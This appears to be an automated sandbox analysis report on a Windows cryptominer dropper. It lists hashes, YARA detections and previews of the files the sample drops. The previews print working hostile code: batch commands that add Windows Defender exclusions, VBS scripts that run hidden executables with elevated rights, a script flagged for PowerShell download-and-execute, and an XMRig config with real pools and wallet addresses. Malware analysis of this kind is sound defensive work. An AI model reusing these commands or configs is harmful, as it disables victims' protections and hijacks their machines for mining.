                                                    SSDEEP:3:jNJmFEm86oQ/FERMQsQJM2xAvOUkh4E2J5xAIXR1WJF3ypFCvn:jqNhtCMGz923fXaFCrsn
                                                    MD5:2A8D534AEEEFA91048C18AAA7253F24F
                                                    SHA1:74990FA706B5415FAE4C7B1E56DA433E391A5186
                                                    SHA-256:415A0887C86C263843C5809A0E112F1BDFC189C8AD596C73ADAC3CB51AAA89D5
                                                    SHA-512:C67328A72BD1096777F4B40E12CCFD11B68640CE788561383B59DC45CD9EE9AC30B6F356964E5F1134F05C14F7BB519E52D703207869DB7323D072EC945DC7AC
                                                    Malicious:true
                                                    Preview:Set Shell = CreateObject("Shell.Application")..Shell.ShellExecute "C:\Users\user\AppData\Local\Temp\est1.cmd", , , "runas", 0..
                                                    Process:C:\Users\user\Desktop\K4gsPJGEi4.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                    Category:dropped
                                                    Size (bytes):45568
                                                    Entropy (8bit):7.750275657742685
                                                    Encrypted:false
                                                    SSDEEP:768:UDR7drWxRrYJAgERvFAREX5DyzaccyOkVDIBF9K/phcanwUaajMIWCW2jsV:2A3cJAgmSRC5DcLxIBLGwUgIW2sV
                                                    MD5:A1CD6A64E8F8AD5D4B6C07DC4113C7EC
                                                    SHA1:60E2F48A51C061BBA72A08F34BE781354F87AA49
                                                    SHA-256:B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577
                                                    SHA-512:87A42901A63793653D49F1C6D410A429CABB470B4C340C4553CBD9ECCACB38D8543F85455465E0A432D737E950C590175DAD744094861F7C3E575446A65B41E8
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L...-'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):2559
                                                    Entropy (8bit):5.059779297812637
                                                    Encrypted:false
                                                    SSDEEP:48:1lNrlNklUldlN5lGIxU+U4bUYPL/GOLEUi4C454LHx7:1/QuHFZ79FS5
                                                    MD5:A47D59A2284C914D39DC42A3CA2A8EEF
                                                    SHA1:D80B2AB17CB86060892094CAB3458B9E2917699F
                                                    SHA-256:5F1D35F50B4DA08E87A19DFDE3D87BD3ED0127844BE6BD9CEF27F43C8A360692
                                                    SHA-512:B85CB7B42CAFB08E36624E03DC7DE7875ABC40B1D1BB644E852EAEA4478FD9C96450CEE4D9169E7DB5A251D0FEF7AB556AD1399647B0EDDA10756317D3C0F8F0
                                                    Malicious:true
                                                    Preview:@echo off..C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp">nul 2>nul..C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\Tweaker">nul 2>nul..C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64\en">nul 2>nul..C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Public">nul 2>nul..C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\Tfile">nul 2>nul..C:\Win
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):132
                                                    Entropy (8bit):4.922431686514802
                                                    Encrypted:false
                                                    SSDEEP:3:jNJmFEm86oQ/FERMQsQJM2xAvOUkh4E2J5xAIYTXb93ypFCvn:jqNhtCMGz923fYbxCrsn
                                                    MD5:A05217BAFFA72A155D5D3F4A06FA5342
                                                    SHA1:583111F7035CF9521487DBC1170B95CD9D344558
                                                    SHA-256:E506568CF4EFDBFF7170458BADA70888D29CE577BA02720ABCC5446FCC1D9967
                                                    SHA-512:FF661C24ABADD67C1BB7E4206232692C237194DC2B97859CF192961FE1053A05E6F209C42DE51D500FE22EB82E09C5B2190D83FCDC7204407BAB0159063D7998
                                                    Malicious:true
                                                    Preview:Set Shell = CreateObject("Shell.Application")..Shell.ShellExecute "C:\Users\user\AppData\Local\Temp\stwinvr.cmd", , , "runas", 0..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):3241944
                                                    Entropy (8bit):6.300666139752175
                                                    Encrypted:false
                                                    SSDEEP:49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
                                                    MD5:A7CDE18F991E97037A7899B7669E2548
                                                    SHA1:0FD0B96FF150A1ECF93206C227A13148933F28CE
                                                    SHA-256:8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
                                                    SHA-512:1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):116497
                                                    Entropy (8bit):5.696102422334751
                                                    Encrypted:false
                                                    SSDEEP:3072:RK8beoKKntiz73PXOAOZa0jgKX8rYNrah:RK8beoKKntiz73PXI4YNre
                                                    MD5:50278C55AC5F5B3EE360E1120803395A
                                                    SHA1:FDD8749518829BC85DF82CE7FDF6317D8B5B1C1F
                                                    SHA-256:CBC976FE4EFF2EC673DCC23EFECF9AB35FA35F1E98D6CEB284F9A12711874A51
                                                    SHA-512:EC8A744A58CD48012B5EB3EB485DEB6A89F50C6AF1DC62F7E11F5758B7C6A8C45FF41F9EE04239E8C770C8C946FEB11AB808422996AB8D3E1B84C363535F316D
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\two.cmd, Author: Joe Security
                                                    • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\two.cmd, Author: Joe Security
                                                    Preview:@echo off..del /f /q "%Temp%\Test1.txt">nul 2>nul..del /f /q "%Temp%\Test1.txt">nul 2>nul..del /f /q "%WINDIR%\System32\V_Test.txt">nul 2>nul..Title cod2..%WINDIR%\System32\bcdedit.exe /deletevalue safeboot>nul 2>nul..IF EXIST "%temp%\screen.exe" (.."%temp%\screen.exe" win hide ititle "cod2"..)..Copy /v /b /y "%temp%\IntelSvc.exe" "%PROGRAMDATA%\IntelSvc.exe">nul 2>nul..if "%USERNAME%" == "" Goto :DEL_EOF..if "%USERPROFILE%" == "" Goto :DEL_EOF..set "HDD=%USERPROFILE%"..Set HDD=%HDD:Users=&::% "%HDD:Users=&::%"..Set "Public=%HDD%Users\Public"..echo "%temp%" 2>NUL| %WINDIR%\System32\findstr.exe /i /c:"Local" >nul 2>nul..if "%errorlevel%" == "0" Goto :calMACDINH..Set "PathR=%temp:\=\\%"..Set "Thisrun=%temp%"..echo "%USERPROFILE%" 2>NUL| %WINDIR%\System32\findstr.exe /i /c:"'" >nul 2>nul..if "%errorlevel%" == "0" Goto :KTDBstar..Goto :BINHTHUONG..:KTDBstar..Set "DBUSER=1"..Set "PathR=%HDD%\Users\\Public\\"..Set "Thisrun=%HDD%Users\Public"..Goto :BINHTHUONG..:calMACDINH..Set "temp1=%USERPR
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):392704
                                                    Entropy (8bit):4.965701476357038
                                                    Encrypted:false
                                                    SSDEEP:6144:ZBULviqYnI3QA7JTXRnZSHL2GZbkG/TZgLgscSzNB:9qBlG/TZgUsjzNB
                                                    MD5:AC27DE51896A5BA2FD0DDA9B7955A201
                                                    SHA1:864A95DEF336B50C70300FF6A7C553F0095A535A
                                                    SHA-256:35D3F6C87CC33F2FDA5B594A6990D8D14E085E313564127A9C0606CEDB398F93
                                                    SHA-512:CD25F4BDC8E6DD845F5C836F50259E2E2C291D99B37071F30007FA13EDEB2D8C82880BF9EEFDB363309C9128F78C7E451954B98ABEFA039EA12E33548771D625
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 47%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6.Y.W...W...W....1..W....'..W.......W...W..<W.... ..W....0..W....5..W..Rich.W..................PE..L....@.T.....................<......S>............@..........................@..............................................d........`..n...............................................................@...............H............................text............................... ..`.rdata...I.......J..................@..@.data....0... ......................@....rsrc...n....`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):8331776
                                                    Entropy (8bit):6.602098080859404
                                                    Encrypted:false
                                                    SSDEEP:98304:C+U9oUzsxBTVgMY9Sh+a+XkHzrkg8wBYzS0XMqdazDU1Cf1bkUTktjT1/TW2L8mh:DVBTTT/Y7Te1LWZH7lDsnNk1ws
                                                    MD5:A6D4706BAEB9AB97490D745F7A2BB11E
                                                    SHA1:A5C96F75D41F1CA22B5B4F66DA15595341AA2EF2
                                                    SHA-256:96D24D557AB0BA58EE36350D2D0EDFDA6EE0E29515C254870789D1CCD6A5CE00
                                                    SHA-512:5D982A8C2F85E9C66E361E659B98891A37009179931DAE06BA0A455A49D1D9FBF4F9FEF93092C320989B09D9D613E48F1453CCEADCD772B6A750F15305AF48AB
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\SysWOW64\en\Au.avi, Author: Joe Security
                                                    • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Windows\SysWOW64\en\Au.avi, Author: unknown
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\SysWOW64\en\Au.avi, Author: unknown
                                                    • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\SysWOW64\en\Au.avi, Author: Florian Roth
                                                    • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\SysWOW64\en\Au.avi, Author: ditekSHen
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 83%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....i.b...............&..^.......2............@.....................................T....`... ..............................................p...F.....S.....u................p...........................`.s.(.......................8............................text.....^.......^.................`..`.data... .....^.......^.............@....rdata..P....._......._.............@..@.pdata........u.......u.............@..@.xdata..@.....x.......x.............@..@.bss.... .2..`|..........................idata...F...p...H...B|.............@....CRT....h.............|.............@....tls.................|.............@....rsrc...S............|.............@....reloc..p............~.............@..B........................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):3241944
                                                    Entropy (8bit):6.300666139752175
                                                    Encrypted:false
                                                    SSDEEP:49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
                                                    MD5:A7CDE18F991E97037A7899B7669E2548
                                                    SHA1:0FD0B96FF150A1ECF93206C227A13148933F28CE
                                                    SHA-256:8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
                                                    SHA-512:1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):14544
                                                    Entropy (8bit):6.2660301556221185
                                                    Encrypted:false
                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1072593
                                                    Entropy (8bit):6.09356912081639
                                                    Encrypted:false
                                                    SSDEEP:12288:R00eV1l1xLc8n0edZLCuKffxOW73ltrAnkUm3FhBhxahwPm6jFWNpfc8AccN4lRw:RDeV1BLci0edZL/OOW7ltCkOvX35F0h7
                                                    MD5:3C47D45F09948B8E6FDB5F96523BC60B
                                                    SHA1:A890EAAE8D5A45D54E7571C4BF780A6EB263586A
                                                    SHA-256:86BB64D0A8D548445E17D4EDEF0A0E5F97D019F3AF524FC9CD625294916C973D
                                                    SHA-512:6B67BB4268595480261FF007058F59AA4505204278B3B094551F14132E9FAF7160019B155831D9AB75D5CAB64C1AC9AD1CEB4A7B6FB5CED87E144E475A74790C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 64%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....R.....+...............L...l................@.................................j......... .........................................................................................................................(............................text...\...........................`.P`.data...d...........................@.`..rdata.............................@.`@/4...........P.......&..............@.0@.bss.....l...p........................`..idata...............<..............@.0..CRT.................L..............@.0..tls.... ............N..............@.0./14..................P..............@.@B/29......L... ...N...R..............@..B/41..........p......................@..B/55.................................@..B/67.................................@.0B/80.....@...........................@..B/91.................................@..B/102....................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):313
                                                    Entropy (8bit):5.135981028520709
                                                    Encrypted:false
                                                    SSDEEP:6:ZDH+7ym/eMTIaHPZLACCmqMeZaHPZLA4qnLVapFIuapv1BIapv:s2MTLg9MnlqnpugHIS
                                                    MD5:2A13CDEE27030A33CF90E49F26B7B1AD
                                                    SHA1:3BB5A27AD6F24BC81AA01461F3D389CC53DB589C
                                                    SHA-256:8D53EF6F3E4FE49126BB49E112FF18813C7FB6C90E1B059746D979788F6721D2
                                                    SHA-512:68CF4A487900DB356CD84EC3D450F2F9DE6410CD110E18C962538DF93E7D94422E3BE22ABC436EA4696143EDF730E2A6317BF1750B8689C12419AD3B208E80F9
                                                    Malicious:false
                                                    Preview:DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\Users\Public\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\Users\Public\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):351
                                                    Entropy (8bit):5.184871037147829
                                                    Encrypted:false
                                                    SSDEEP:6:ZDH+7ym/eMTI923f+aLACCmqMeZ923f+aLA4qnLVapFIuapv1BIapv:s2MThJg9MdJlqnpugHIS
                                                    MD5:B89E4D1C73C93C1F5EB440DD32D2E9EE
                                                    SHA1:9164AD042146C0EF70B3A59DA92BE1AD2C8F20EB
                                                    SHA-256:C132F398422167FE43AE86CA3CADCE67BE7BD33560FE42C12FFE067960A197D8
                                                    SHA-512:084AD2D043ED93964B397EC6F98268D227586DB758D0E3789D269B6A8B3A46381C01FED6D79BD1D5A76D4545A798148BD5448F671EF1AD87544100DE32F3B32D
                                                    Malicious:false
                                                    Preview:DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\Users\user\AppData\Local\Temp\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\Users\user\AppData\Local\Temp\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):88576
                                                    Entropy (8bit):6.15492829325332
                                                    Encrypted:false
                                                    SSDEEP:1536:ufVX5SG8cD++OTJ5enxjSiXkSxf5DqWtp0XU1jDBBrjK8o3agdbx583+fs7k+nUI:O5SG7S6/7k+nUwoL1xii2l8NXQUQUlC
                                                    MD5:DDD12566B99343B96609AFA2524ECEC3
                                                    SHA1:8FEF2C2BC87EF7D135296FDB4CF9ECD9C0322D55
                                                    SHA-256:767B877E735C425BF05C34683356ABFDE4070B092F17A4741EA5AC490611F3DE
                                                    SHA-512:B11A36B25B5C34CD86C367C4003F76F360965FDBC67CA1F30AFEC3A744D419C03D70ADE2423AD6A1D2858561F732DB9F1D1A279A37B045F8A5FAA9C53DBE30BD
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 39%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T.....................V...N................@.................................z......... .....................................................................................................................T................................text...<...........................`.P`.data...\...........................@.`..rdata..`V.......X..................@.`@.eh_fram.....p.......D..............@.0@.bss....tL............................`..idata...............H..............@.0..CRT.................V..............@.0..tls.... ............X..............@.0.................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):938
                                                    Entropy (8bit):5.57285235961628
                                                    Encrypted:false
                                                    SSDEEP:24:hDbdmeOM6p75x2iSkel575T96x7J7q7bel57536x7J7q7be9:ZhU1V5xvsP5x6BJ7q7CP536BJ7q7C9
                                                    MD5:73D059C6788D35FBF1CDC6ABD799DF52
                                                    SHA1:A6AF58E1C8EFCACC1A053E6BEA819067ACC0C8C4
                                                    SHA-256:C90CA39AE1993D6171792AE37D19768B887DB22D3912650F7E5FB938537FC77D
                                                    SHA-512:EE6057A92328E756599DFAF998081B88F56EDF486C8ADBB5EA8F7DA8B718693D502314C2260F9B1FDC7196F2033DDE7C30ABF06BAD8AB1F45655DF2599DFC9CD
                                                    Malicious:false
                                                    Preview:{.."autosave": true,.."background": true,.."title": true,.."cpu": true,.."opencl": false,.."cuda": false,.."retries": 1,.."retry-pause": 2,.."pools": [..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:13333",.."user": "8Bg9mc5vUWw8dL8jCxbVda9ukMHxpisqmfCaaUDbngS8jGRS7cuRu1HC6m2dEKZW7yBpDQ3fRQtFShEDXTSbQ9pf5Tk2Sut.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:443",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "xmr.2miners.com:2222",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..}..]..}..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):264
                                                    Entropy (8bit):5.579378925177609
                                                    Encrypted:false
                                                    SSDEEP:6:e5odPXvqzm8giMafKn71g7pqfAWFZLabXx1EXYfFROMfoIj:Yo9i6x7ao71g7plWPazAYEMTj
                                                    MD5:B01A9D0151625441C4FC500F2E227439
                                                    SHA1:0F2EC5AC6C9CFE12161512FC237E39335A82BF99
                                                    SHA-256:3EE3ED71F81D848BF7978E0137F475D670EC59596870B0FFE0C6D8FC397B48D0
                                                    SHA-512:A91635B587128EDBBFE1BF65E1AF3E66AA19E422BF00FCF78175756EC82022C61AB12E2AE484C2D1389CFA1CB5915EA3D1DB73242BD7D14E74BD917B49F60D96
                                                    Malicious:false
                                                    Preview:[RandomX]..wallet = 84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T..pool1 = auto.c3pool.org:13333..pool2 = auto.c3pool.org:443..pool3 = xmr.2miners.com:2222..pool4 = xmr.GHhA5Joo.com:2222..noLog = true..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                    Category:dropped
                                                    Size (bytes):45568
                                                    Entropy (8bit):7.750275657742685
                                                    Encrypted:false
                                                    SSDEEP:768:UDR7drWxRrYJAgERvFAREX5DyzaccyOkVDIBF9K/phcanwUaajMIWCW2jsV:2A3cJAgmSRC5DcLxIBLGwUgIW2sV
                                                    MD5:A1CD6A64E8F8AD5D4B6C07DC4113C7EC
                                                    SHA1:60E2F48A51C061BBA72A08F34BE781354F87AA49
                                                    SHA-256:B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577
                                                    SHA-512:87A42901A63793653D49F1C6D410A429CABB470B4C340C4553CBD9ECCACB38D8543F85455465E0A432D737E950C590175DAD744094861F7C3E575446A65B41E8
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L...-'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                    Category:dropped
                                                    Size (bytes):28
                                                    Entropy (8bit):4.208966082694623
                                                    Encrypted:false
                                                    SSDEEP:3:nLWGWNI3ov:nyGWNOov
                                                    MD5:F2CE4C29DC78D5906090690C345EAF80
                                                    SHA1:D12E3B86380F0DBEF4FBDFFE2CBFE2144FB7E9CD
                                                    SHA-256:0356A869FC7E6495BAC33303B002935C317166D0EA5D403BE162573CF01055D8
                                                    SHA-512:51F939C41710BC3A4E443CDAF33AAE614B043ACC2382A0C836049E34D2F51C8195FD149548752B33E4EDD4299548BB1957B89997FC640C837C9400D76FEA5B74
                                                    Malicious:false
                                                    Preview:No Instance(s) Available....
                                                    Process:C:\Windows\SysWOW64\attrib.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):134
                                                    Entropy (8bit):4.756669205234865
                                                    Encrypted:false
                                                    SSDEEP:3:PtwyFU6uVN18CzKCVPtwyFU6uVNOLSk3ACXVn:+NP1F5PGNPWS+nFn
                                                    MD5:BA597551DBA95670981C343CA015D82E
                                                    SHA1:2B648FAF5368C2C6CCFFFD4819D2969B32BE641A
                                                    SHA-256:44CDE187D7B8061C3655F1F11B4663F9863A6F752B887FD3060C9BCDA9E9AC7A
                                                    SHA-512:DDC041072C4496E8A622ABD895830FDD9D1C6BE1109F5FEEC31411773710093F2A45689B1C13F206B0A5E3AA83D617A93F1D4F2212A539A9974BBC3588238EAA
                                                    Malicious:false
                                                    Preview:Access denied - C:\Windows\SysWOW64\en\AuthFWSnapIn.Resources.dll..Access denied - C:\Windows\SysWOW64\en\AuthFWWizFwk.Resources.dll..
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):6.5611612679491165
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 92.60%
                                                    • Win32 Executable Borland Delphi 7 (665061/41) 6.16%
                                                    • InstallShield setup (43055/19) 0.40%
                                                    • UPX compressed Win32 Executable (30571/9) 0.28%
                                                    • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                    File name:K4gsPJGEi4.exe
                                                    File size:13'410'304 bytes
                                                    MD5:997f25415b30c6da407a75c55806d752
                                                    SHA1:5efadd4bfb032e773492a42c391b3be12eabbe98
                                                    SHA256:a606d29ead61ee09f59236f0c105763d1e3aba914edc30210425049ad5ce275b
                                                    SHA512:d752d2fbc5c82df7f1141d0bc3b16ba17d3fd8d0dadb959cf7ba62735e9bdc21ae49d5d96de797e231a4a442cb0287a4b5b6f72a9f375b910e288f645ff9c09d
                                                    SSDEEP:196608:zAhYdQPyedZLOOW7jjVBTTT/Y7Te1LWZH7lDsnNk1wsy:zAm57GGLWZH7lMG1ly
                                                    TLSH:30D69E22F29344F8C5679270562BA773BA31FC654730AEAB7354EB381E62ED0193DB14
                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                    Icon Hash:be9f361733110601
                                                    Entrypoint:0x4138e0
                                                    Entrypoint Section:CODE
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                    DLL Characteristics:
                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:8121da246ea94cbab5bbea46d181bdcb
                                                    Instruction
                                                    push ebp
                                                    mov ebp, esp
                                                    mov ecx, 0000000Dh
                                                    push 00000000h
                                                    push 00000000h
                                                    dec ecx
                                                    jne 00007F0208E8221Bh
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    mov eax, 00413850h
                                                    call 00007F0208E74155h
                                                    xor eax, eax
                                                    push ebp
                                                    push 00413FACh
                                                    push dword ptr fs:[eax]
                                                    mov dword ptr fs:[eax], esp
                                                    mov eax, 00000190h
                                                    call 00007F0208E80D01h
                                                    test al, al
                                                    je 00007F0208E82229h
                                                    push 00000000h
                                                    call 00007F0208E7422Eh
                                                    lea edx, dword ptr [ebp-14h]
                                                    mov eax, 00000001h
                                                    call 00007F0208E711EDh
                                                    mov eax, dword ptr [ebp-14h]
                                                    push eax
